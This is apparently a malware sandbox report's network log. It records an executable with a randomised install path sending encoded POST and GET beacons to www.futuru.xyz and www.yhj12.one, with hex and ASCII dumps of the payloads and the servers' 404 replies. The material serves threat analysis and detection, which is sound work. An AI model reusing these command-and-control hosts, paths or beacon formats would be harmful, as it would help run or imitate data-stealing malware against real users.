                                                                                      Data Raw: 55 62 52 78 6d 3d 52 30 42 44 36 67 72 49 6b 4e 52 30 6d 72 38 76 68 66 57 41 77 53 61 70 75 32 7a 6f 67 45 38 6f 46 79 47 6f 31 38 33 71 55 75 31 6b 55 76 59 33 51 4d 7a 38 73 67 69 4b 53 2f 37 74 49 74 34 72 4d 43 50 4b 77 39 45 4f 2f 70 67 67 4d 51 43 30 50 76 6d 32 6f 53 6d 53 4a 77 66 61 2b 4e 6b 6e 47 6b 64 38 53 65 6d 30 35 78 5a 2f 67 58 6f 63 7a 41 34 56 32 33 6c 57 6c 45 4f 41 6e 33 78 66 51 64 67 49 48 68 74 45 70 4e 77 4e 59 31 5a 77 6e 7a 78 74 48 67 5a 76 39 7a 70 4d 30 39 64 72 38 58 37 45 35 50 74 32 33 47 57 44 5a 4c 4d 78 66 31 6b 42 47 46 54 56 45 2f 73 77 39 2f 75 4c 49 37 72 70 4d 4f 77 3d
                                                                                      Data Ascii: UbRxm=R0BD6grIkNR0mr8vhfWAwSapu2zogE8oFyGo183qUu1kUvY3QMz8sgiKS/7tIt4rMCPKw9EO/pggMQC0Pvm2oSmSJwfa+NknGkd8Sem05xZ/gXoczA4V23lWlEOAn3xfQdgIHhtEpNwNY1ZwnzxtHgZv9zpM09dr8X7E5Pt23GWDZLMxf1kBGFTVE/sw9/uLI7rpMOw=
                                                                                      Nov 25, 2024 13:56:21.198311090 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:20 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.849723209.74.77.109806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:22.584954023 CET772OUTPOST /8uep/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.futuru.xyz
                                                                                      Origin: http://www.futuru.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.futuru.xyz/8uep/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 52 30 42 44 36 67 72 49 6b 4e 52 30 33 34 6b 76 6e 2b 57 41 68 69 61 71 72 32 7a 6f 75 6b 38 57 46 79 4b 6f 31 2b 48 36 56 63 68 6b 58 4b 38 33 52 4a 66 38 67 41 69 4b 5a 66 37 6f 58 39 35 70 4d 44 7a 34 77 2f 67 4f 2f 6f 45 67 4d 55 47 30 50 65 6d 31 6f 43 6d 51 43 51 66 55 77 74 6b 6e 47 6b 64 38 53 65 61 4f 35 77 39 2f 68 6b 41 63 79 6b 73 57 31 33 6c 52 31 55 4f 41 6a 33 77 57 51 64 67 71 48 67 78 69 70 50 34 4e 59 30 4a 77 6e 43 78 75 65 51 5a 70 69 44 70 65 37 6f 30 47 31 6d 76 54 35 4e 68 4a 6f 58 57 32 63 39 39 62 46 58 73 48 46 46 37 2b 45 38 45 47 34 49 7a 6a 53 59 37 5a 53 5a 6b 33 52 58 65 4c 4f 51 77 6f 79 2b 44 72 71 52 56 39 4a 37 73 51
                                                                                      Data Ascii: UbRxm=R0BD6grIkNR034kvn+WAhiaqr2zouk8WFyKo1+H6VchkXK83RJf8gAiKZf7oX95pMDz4w/gO/oEgMUG0Pem1oCmQCQfUwtknGkd8SeaO5w9/hkAcyksW13lR1UOAj3wWQdgqHgxipP4NY0JwnCxueQZpiDpe7o0G1mvT5NhJoXW2c99bFXsHFF7+E8EG4IzjSY7ZSZk3RXeLOQwoy+DrqRV9J7sQ
                                                                                      Nov 25, 2024 13:56:23.837104082 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:23 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.849724209.74.77.109806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:25.255928993 CET1789OUTPOST /8uep/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.futuru.xyz
                                                                                      Origin: http://www.futuru.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.futuru.xyz/8uep/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 52 30 42 44 36 67 72 49 6b 4e 52 30 33 34 6b 76 6e 2b 57 41 68 69 61 71 72 32 7a 6f 75 6b 38 57 46 79 4b 6f 31 2b 48 36 56 63 5a 6b 55 38 67 33 51 75 4c 38 6a 41 69 4b 61 66 37 54 58 39 35 6f 4d 43 62 47 77 2f 63 65 2f 71 4d 67 4e 33 65 30 4a 71 79 31 69 43 6d 51 4e 77 66 56 2b 4e 6b 2b 47 6b 4e 77 53 66 32 4f 35 77 39 2f 68 69 38 63 37 51 34 57 34 58 6c 57 6c 45 4f 4d 6e 33 78 2f 51 64 6f 41 48 67 46 55 6f 2f 59 4e 66 55 35 77 6c 51 5a 75 42 67 5a 72 6a 44 6f 4e 37 6f 77 46 31 6d 43 71 35 4d 56 6a 6f 51 61 32 63 37 77 62 64 45 49 64 62 30 48 2f 42 4f 68 35 78 4c 4b 43 51 4c 48 53 64 62 73 6f 46 52 36 42 42 52 38 5a 78 2f 65 51 38 45 4e 77 4f 64 46 59 38 47 39 70 79 73 4a 37 5a 68 5a 70 66 52 4d 6a 32 36 4a 61 33 50 51 61 33 6e 56 58 55 6b 71 66 35 53 43 57 4b 48 6e 42 43 46 34 71 6f 37 52 46 38 51 6c 41 59 4e 7a 61 77 49 51 73 57 34 2b 48 67 66 4d 67 6e 33 6e 65 78 2b 6a 4b 4c 5a 6b 43 2f 5a 38 4f 53 34 4b 6f 69 71 33 65 57 2b 51 74 7a 50 71 65 35 74 36 78 44 50 34 42 41 78 6c 4b [TRUNCATED]
                                                                                      Data Ascii: UbRxm=R0BD6grIkNR034kvn+WAhiaqr2zouk8WFyKo1+H6VcZkU8g3QuL8jAiKaf7TX95oMCbGw/ce/qMgN3e0Jqy1iCmQNwfV+Nk+GkNwSf2O5w9/hi8c7Q4W4XlWlEOMn3x/QdoAHgFUo/YNfU5wlQZuBgZrjDoN7owF1mCq5MVjoQa2c7wbdEIdb0H/BOh5xLKCQLHSdbsoFR6BBR8Zx/eQ8ENwOdFY8G9pysJ7ZhZpfRMj26Ja3PQa3nVXUkqf5SCWKHnBCF4qo7RF8QlAYNzawIQsW4+HgfMgn3nex+jKLZkC/Z8OS4Koiq3eW+QtzPqe5t6xDP4BAxlK7UCcY0E4+Wtl5IW3WngTSHQidft6XGOERxw1gysRCiNPLyxSKH06l+gxIKQTS3lao170UPymR92zeheaBkPAoPsytG8WYcSnAfq/ReaanMarXv7lgaTkeYe9gjxYw89ejizH6BhyCclrdT1YLR5ltCflMn/dL7mCf8yRPomMg8wKvV8lcI5ABknUlK2Ee6w1bdNo4GgO3np54lJiVXVhQx5p5qgubPYZZf+cl87Mk9KcHsuGdsl9JRMm8dOOhVGz8oPx5Cw6q8EM4/T9QsLfY1cG/HKnAY165pLQsMO4IHD7OzXLQhcgyMHLj0yZRin+pWX199wdG7TwzXR24eyeIixaiWL+iaDgy7ng5BKwsSBfzb2uq+B/9EEUSlLnecz6tPeIK6NZxM0p7JcX1SCss4a5QdFBjcrqJFDJ8C7D9h5CHYY1i2spfTYdbw0LMiWkC4IJSh+4MGLyCm5B2pwt9wrwq3U7YjDUEAs7xfKosYiM/VHqfjSW6GrBQczLSZIz3w1gDGeXLgd/i8HRUzRisYJliedRphrVRPleqVGaW4/XgJHpRc86s4yIaTCeJKc+BU7xpPeGUeRd+Gt+Tq8RhPnsu2R/5vFa9zvqSkDJU8PoX+y2p4OGQLQUFa7A4uC1hBQDIiTzUovEKo/l0aNp9GnsZ8hfpeV26s [TRUNCATED]
                                                                                      Nov 25, 2024 13:56:26.511651039 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:26 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.849725209.74.77.109806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:27.913479090 CET508OUTGET /8uep/?UbRxm=c2pj5XzU4r8mroY+x9nXsVmXiRTTvEExFimN19zxWLYZcfwNZM3Ctl+xWcy7JvpSNCmS4f8+1JlLQGO0Hv+UiSuhGSb748cjOyYKQpOu9XZhhnIssQky4Xxuz1j9m1caEA==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.futuru.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:29.193669081 CET548INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:28 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.84972638.181.21.85806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:34.899224043 CET749OUTPOST /bi55/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.yhj12.one
                                                                                      Origin: http://www.yhj12.one
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.yhj12.one/bi55/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 77 58 33 4b 52 39 6a 73 79 48 39 42 68 32 62 66 6c 6b 50 4b 2f 64 64 4f 77 31 6a 47 47 37 33 4d 4a 31 33 64 6b 42 59 43 6d 69 78 6c 6b 34 42 41 48 30 53 54 37 75 4c 62 59 31 34 31 48 39 33 31 4f 77 2f 49 55 47 4a 6b 33 32 30 41 59 55 52 51 4d 69 75 46 42 7a 75 30 50 49 6f 69 4c 6d 51 61 77 57 70 78 62 6b 44 7a 2f 6d 34 68 5a 6e 39 62 61 72 2f 4d 59 68 72 7a 59 31 70 48 52 77 62 62 32 61 36 4b 39 4b 77 35 33 53 68 4b 75 77 45 52 4d 51 61 2b 59 7a 71 50 5a 4b 71 35 4b 74 78 36 72 7a 4c 2b 6a 63 43 45 38 36 76 30 4f 52 65 78 64 72 74 46 57 50 6f 61 64 4a 46 51 35 78 44 41 77 51 42 35 6a 30 41 3d
                                                                                      Data Ascii: UbRxm=wX3KR9jsyH9Bh2bflkPK/ddOw1jGG73MJ13dkBYCmixlk4BAH0ST7uLbY141H931Ow/IUGJk320AYURQMiuFBzu0PIoiLmQawWpxbkDz/m4hZn9bar/MYhrzY1pHRwbb2a6K9Kw53ShKuwERMQa+YzqPZKq5Ktx6rzL+jcCE86v0ORexdrtFWPoadJFQ5xDAwQB5j0A=
                                                                                      Nov 25, 2024 13:56:36.455631018 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:56:36 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "6693a1e3-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.84972738.181.21.85806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:37.575434923 CET769OUTPOST /bi55/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.yhj12.one
                                                                                      Origin: http://www.yhj12.one
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.yhj12.one/bi55/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 77 58 33 4b 52 39 6a 73 79 48 39 42 6e 58 72 66 6e 48 33 4b 35 39 64 4e 2f 56 6a 47 4d 62 33 49 4a 30 4c 64 6b 41 63 53 6d 57 64 6c 71 39 74 41 47 31 53 54 32 4f 4c 62 54 56 34 38 49 64 33 41 4f 77 6a 32 55 48 46 6b 33 32 67 41 59 57 4a 51 4e 56 36 43 4f 44 75 79 57 59 6f 67 47 47 51 61 77 57 70 78 62 6b 6e 5a 2f 6c 49 68 5a 33 4e 62 61 4b 2f 50 47 52 72 77 49 6c 70 48 48 77 62 66 32 61 36 34 39 4f 34 54 33 52 5a 4b 75 78 30 52 4d 68 61 78 52 7a 71 4a 55 71 72 4e 4f 64 67 6d 74 7a 65 65 6c 4e 71 51 33 6f 6a 5a 43 48 76 62 48 4a 6c 44 56 50 41 78 64 4b 74 6d 38 47 65 6f 71 7a 52 4a 39 6a 56 72 4c 79 6e 35 42 67 68 64 6c 4d 32 50 39 44 48 4c 6f 67 63 78
                                                                                      Data Ascii: UbRxm=wX3KR9jsyH9BnXrfnH3K59dN/VjGMb3IJ0LdkAcSmWdlq9tAG1ST2OLbTV48Id3AOwj2UHFk32gAYWJQNV6CODuyWYogGGQawWpxbknZ/lIhZ3NbaK/PGRrwIlpHHwbf2a649O4T3RZKux0RMhaxRzqJUqrNOdgmtzeelNqQ3ojZCHvbHJlDVPAxdKtm8GeoqzRJ9jVrLyn5BghdlM2P9DHLogcx


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.84972838.181.21.85806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:56:40.239509106 CET1786OUTPOST /bi55/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.yhj12.one
                                                                                      Origin: http://www.yhj12.one
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.yhj12.one/bi55/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 77 58 33 4b 52 39 6a 73 79 48 39 42 6e 58 72 66 6e 48 33 4b 35 39 64 4e 2f 56 6a 47 4d 62 33 49 4a 30 4c 64 6b 41 63 53 6d 58 4a 6c 71 50 6c 41 48 57 36 54 35 75 4c 62 51 56 34 35 49 64 33 6e 4f 77 37 71 55 48 35 61 33 31 59 41 59 33 70 51 4b 67 47 43 5a 7a 75 79 65 34 6f 6c 4c 6d 52 51 77 57 35 4c 62 6b 33 5a 2f 6c 49 68 5a 78 4a 62 54 37 2f 50 45 52 72 7a 59 31 70 39 52 77 62 6a 32 61 53 6f 39 4f 38 70 33 41 35 4b 75 52 6b 52 66 6a 43 78 4d 44 71 4c 58 71 72 56 4f 64 73 50 74 7a 7a 76 6c 4e 75 36 33 71 7a 5a 41 53 79 6b 54 49 6c 50 58 4d 35 42 61 4c 6b 45 38 58 54 4c 6a 67 38 2b 77 6a 63 4d 49 58 54 69 4c 57 31 48 75 37 58 35 70 6b 2b 64 6d 6e 49 78 78 33 52 45 36 71 4b 66 6b 4d 66 66 58 7a 4a 2f 56 35 49 41 38 54 32 42 76 79 44 6b 55 37 41 6a 58 68 6b 6f 52 44 35 41 4d 38 67 73 61 52 42 31 49 78 42 52 61 4a 52 77 33 72 58 71 61 42 70 74 57 2b 6f 2b 49 37 38 4d 71 34 34 73 43 4b 63 43 4d 7a 37 4f 42 50 4b 42 51 75 70 41 43 38 42 36 30 6d 36 78 58 51 4a 78 61 41 72 4e 33 56 35 4e [TRUNCATED]
                                                                                      Data Ascii: UbRxm=wX3KR9jsyH9BnXrfnH3K59dN/VjGMb3IJ0LdkAcSmXJlqPlAHW6T5uLbQV45Id3nOw7qUH5a31YAY3pQKgGCZzuye4olLmRQwW5Lbk3Z/lIhZxJbT7/PERrzY1p9Rwbj2aSo9O8p3A5KuRkRfjCxMDqLXqrVOdsPtzzvlNu63qzZASykTIlPXM5BaLkE8XTLjg8+wjcMIXTiLW1Hu7X5pk+dmnIxx3RE6qKfkMffXzJ/V5IA8T2BvyDkU7AjXhkoRD5AM8gsaRB1IxBRaJRw3rXqaBptW+o+I78Mq44sCKcCMz7OBPKBQupAC8B60m6xXQJxaArN3V5NcJ4rfMeeiUVflIaJSyAmz5MKa9+EhOrERMMw4TnQlpO/7b4pR1HgPlp6YGUqCIv6weVkREELw2+h80m8JWjFuvhmcb5KCzMh9X7sjeKE7SNtBUCRqvARxmmpIrnMKY05Rrdrclwp/aLxb+a/hoeVyys/r76RF6/FRNSbfMIDqiBiVnD+dUd6pYkeGzQq+tKKKzbAcjA8x/ux+IQe9jRDkRnQ0W6BA8Lvwm7O/m/nM47eJqCdNYrotrbZU9IEAoYaMRZ+gCfdFbYwx2/w9TBgkHv1vnC00REsDw34hOKOiLjUR7e+ZQAoqqtsjYnfNAEhdBZqmOPN7mDghhF3rioffjawUN+IBnwsdfjzTf9aO5XJvTA53i4wO1JDFG3XfmBubGa1wS3NV3RaxkaL8Jr8Dxn3iGG4QUfpVPnlnn/RBgt9xds9VQ17zGdghzYtqQl9roWRaf8SYAJY7vMFxefe7vM9nT0JDvPAudNSVE6Jx7xFfFkeElkHP4pI2bXVyt2074s2hUxOk/isBZ4Lf+E/IWeey1VsULitW5kDJ9Fn5KKBcEAavOzephxjHPglM1gMHAS6hHGAOYIKUYjT6EERvO0wKme1iQjmTr6JvA0nmO6asVyW5uL+uOAtKkWpWGcG3HT4OmWIIkkE/zFwoaBRtXMwXJvgxOUmzm [TRUNCATED]
